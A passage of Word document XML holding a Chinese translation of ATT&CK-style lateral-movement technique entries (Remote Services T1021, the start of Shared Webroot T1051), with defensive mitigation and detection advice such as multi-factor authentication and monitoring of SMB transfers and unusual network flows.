                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特定</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:t>攻击者恶意软件流量</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:t>异常数据</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>传输（通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:t>已知</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:lastRenderedPageBreak/>
              <w:t>工具和协议</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，如</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>FTP</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:t>入侵检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:t>防御系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来缓解网络级别活动的影响。签名通常是协议中的唯一指示符，可能基于攻击者或工具的特定混淆技术，并且在各种恶意软件系列和版本中可能会有所不同。攻击者可能会随着时间的推移更改工具</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C2</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>签名，或者构建协议</w:t>
            </w:r>
            <w:r w:rsidRPr="00E57B02">
              <w:t>来逃避常见防御工具的检测。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E9EF33A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E5C817" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743A1A41" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件创建和通过</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在网络内传输的文件。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>外网连接的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异常</w:t>
      </w:r>
      <w:r>
        <w:t>进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>系统上创建文件是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可疑</w:t>
      </w:r>
      <w:r>
        <w:t>的。</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用通常不会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的实用程序（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）也可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是可疑</w:t>
      </w:r>
      <w:r>
        <w:t>的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740E3236" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析网络数据中不常见的数据流（例如，客户端发送的数据明显多于从服务器接收的数据）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA93288" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果以前</w:t>
      </w:r>
      <w:r>
        <w:t>不和网络通信的进程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在</w:t>
      </w:r>
      <w:r>
        <w:t>使用了网络，或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现了</w:t>
      </w:r>
      <w:r>
        <w:t>以前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从未</w:t>
      </w:r>
      <w:r>
        <w:t>见过的进程，则是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析数据包内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测未遵循所使用端口的预期协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7904816A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007C75AD" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C75AD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>远程</w:t>
      </w:r>
      <w:r w:rsidRPr="007C75AD">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>服务</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="51BD9D56" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CE5C2EF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>T1021</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55741560" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>技术：横向移动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6164F9CF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79D076A7" w14:textId="4A4E16EC" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>系统要求：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有</w:t>
            </w:r>
            <w:r>
              <w:t>连接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>及</w:t>
            </w:r>
            <w:r>
              <w:t>有效</w:t>
            </w:r>
            <w:r w:rsidR="006508E9">
              <w:t>凭据</w:t>
            </w:r>
            <w:r>
              <w:t>的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>活动</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>远程服务</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D64D98E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>认证日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30FB0437" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>编号：</w:t>
            </w:r>
            <w:hyperlink r:id="rId222" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00FE38DE">
                <w:t>CAPEC-555</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="28DD6D7A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7249D909" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00922ACD" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16182496" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能会</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用有效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录专门用于接受远程连接的服务，例如</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>telnet</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VNC</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r>
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以登录用户身份执行操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37403AC7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2719"/>
        <w:gridCol w:w="7017"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="007C75AD" w14:paraId="60C231FA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2719" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="361BA52F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007C75AD" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007C75AD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5D9CBB16" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007C75AD" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007C75AD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="007C75AD" w14:paraId="04C2EAA4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15042EBF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007C75AD" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId223" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="007C75AD">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>多因子认证</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C821094" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007C75AD" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007C75AD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>尽可能在远程服务登录上使用多因子身份认证。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="007C75AD" w14:paraId="64E51D21" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44B04622" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007C75AD" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId224" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="007C75AD">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>用户账号管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="397F54CD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007C75AD" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007C75AD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制可能使用远程服务的账号。限制有较高攻击风险账号的权限；例如，配置</w:t>
            </w:r>
            <w:r w:rsidRPr="007C75AD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>SSH</w:t>
            </w:r>
            <w:r w:rsidRPr="007C75AD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使得用户只能运行特定程序。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="449B60F7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17E3C5BD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1825AD9E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找出</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程服务相关的登录活动与异常行为或其他恶意或可疑活动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之间的</w:t>
      </w:r>
      <w:r>
        <w:t>关系</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5630">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。攻击者可能需要在尝试横向移动之前通过发现技术来了解环境和系统之间的关系。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78824496" w14:textId="228A69C6" w:rsidR="00A0413E" w:rsidRDefault="00EC6EF4" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>共享</w:t>
      </w:r>
      <w:r w:rsidR="00A0413E">
        <w:t>Webroot</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="71EB97BE" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="388E258E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> T1051</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40438430" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>横向移动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="793309D7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="360D663B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>系统要求</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t>在远程系统上共享</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t>webroot</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t>目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B17B947" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="182BBC73" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B553C5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B553C5">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:hyperlink r:id="rId225" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00B553C5">
                <w:t>CAPEC-563</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00B553C5">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
